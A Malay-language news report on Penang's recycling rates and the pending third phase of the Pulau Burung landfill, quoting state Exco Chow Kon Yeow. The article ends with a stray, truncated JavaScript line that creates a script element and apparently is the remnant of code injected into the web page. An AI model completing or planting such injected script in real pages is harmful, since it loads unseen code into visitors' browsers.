MPSP catat kitar semula paling tinggi dalam negara – Exco

Oleh : ZAINULFAQAR YAACOB
Gambar : AHMAD ADIL MUHAMAD

SEBERANG JAYA – Kerajaan Negeri berharap 40 peratus kitar semula yang disasarkan bagi negara-negara maju peringkat antarabangsa mampu dicapai Pulau Pinang menjelang tahun 2020.

Exco Kerajaan Tempatan, Pengurusan Lalulintas dan Tebatan Banjir, Chow Kon Yeow memberitahu, kadar tersebut mampu direalisasikan memandangkan kedua-dua pihak berkuasa tempatan (PBT) sejak berapa tahun lepas telahpun berjaya mencapai sasaran kitar semula tahunan peringkat kebangsaan bagi 2020, iaitu pada kadar 24 peratus.

“Difahamkan, kadar kitar semula tahunan sekarang bagi Majlis Bandaraya Pulau Pinang (MBPP) dan Majlis Perbandaran Sebarang Perai (MPSP) masing-masing 28 peratus dan 34 peratus.

“Pulau Pinang sekarang adalah negeri tertinggi mengamalkan kitar semula dengan (kadar purata) 31 peratus dan MPSP merupakan PBT yang melakukan kitar semula paling tinggi di negara ini.

“Pulau Pinang sebenarnya telahpun berjaya mencapai sasaran kebangsaan (sejak) berapa tahun lalu, maka, kita (Kerajaan Negeri) sasar mengikut sasaran antarabangsa bagi negara-negara maju pada kadar 40 peratus (sisa pepejal) dikitar semula sebelum tahun 2020,” katanya pada Majlis Rising & Capacity Building On Organic Waste Management Stakeholder Workshop di sini baru-baru ini.

Setiausaha MBPP, Ir. Ang Aing Thye dan Setiausaha MPSP, Sr. Rozali Mohamud turut hadir pada majlis yang mendapat sokongan langsung daripada United Nations Environment Programme (UNEP) berkaitan.

Kon Yeow dalam pada itu berharap Pulau Pinang mendapat sokongan dana daripada badan-badan antarabangsa berwajib kelak, termasuk UNEP sendiri.

Dalam perkembangan berkaitan, Kon Yeow memberitahu bahawa rancangan MPSP untuk membuka tapak pelupusan baru di Tapak Pelupusan Sisa Pepejal Pulau Burung dekat Daerah Seberang Perai Selatan (SPS) masih menunggu proses kelulusan berwajib daripada Penilaian Kesan Alam Sekitar (EIA).

“Fasa tiga Tapak Pelupusan Sampah Pulau Burung masih menunggu kelulusan daripada EIA dan harap dapat dibuka, sebelum ketinggian sampah di tapak fasa satu dan fasa dua sampai pada tahap maksimum,” ujar beliau yang juga Ahli Dewan Undangan Negeri (ADUN) Padang Kota.

var d=document;var s=d.createElement(‘script’);